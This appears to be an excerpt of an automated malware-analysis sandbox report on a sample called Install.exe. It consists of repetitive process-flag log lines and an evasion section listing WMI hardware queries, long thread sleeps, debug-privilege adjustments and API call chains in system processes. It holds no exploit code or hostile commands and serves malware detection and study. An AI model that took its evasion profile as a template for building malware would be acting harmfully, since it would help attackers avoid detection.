Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\34432.exe TID: 6972 Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Roaming\34432.exe TID: 6972 Thread sleep time: -68000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116 Thread sleep count: 5547 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112 Thread sleep count: 3401 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780 Thread sleep count: 5587 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772 Thread sleep count: 2582 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2296 Thread sleep count: 989 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724 Thread sleep count: 137 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248 Thread sleep count: 2928 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596 Thread sleep count: 272 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6600 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 3296 Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 3296 Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 6828 Thread sleep count: 77 > 30
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 6828 Thread sleep time: -77000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912 Thread sleep count: 3963 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1368 Thread sleep count: 581 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1344 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340 Thread sleep count: 1048 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340 Thread sleep count: 151 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148 Thread sleep count: 63 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4180 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5547
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3401
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5587
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2582
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 989
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3963
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 581
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1048
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\lsass.exe API coverage: 3.2 %
Source: C:\Windows\System32\svchost.exe API coverage: 3.2 %
Source: C:\Windows\System32\svchost.exe API coverage: 3.2 %
Source: C:\Windows\System32\lsass.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Install.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\34432.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Install.exe Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Install.exe Code function: 1_2_00406873 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Install.exe Code function: 1_2_0040290B FindFirstFileW,
Source: C:\Windows\System32\nslookup.exe Code function: 22_2_0000000140006E1C FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exe Code function: 39_2_00000001400073C8 FindFirstFileExW,
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001AFDDD0D0E4 FindFirstFileExW,
Source: C:\Windows\System32\lsass.exe Code function: 44_2_00000240B2BBD0E4 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001CAF3D0D0E4 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exe Code function: 49_2_000001B8BFF4D0E4 FindFirstFileExW,
Source: C:\Windows\System32\nslookup.exe Code function: 22_2_0000000140005D5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\nslookup.exe Code function: 22_2_00000001400090E0 GetProcessHeap,
Source: C:\Users\user\AppData\Roaming\34432.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
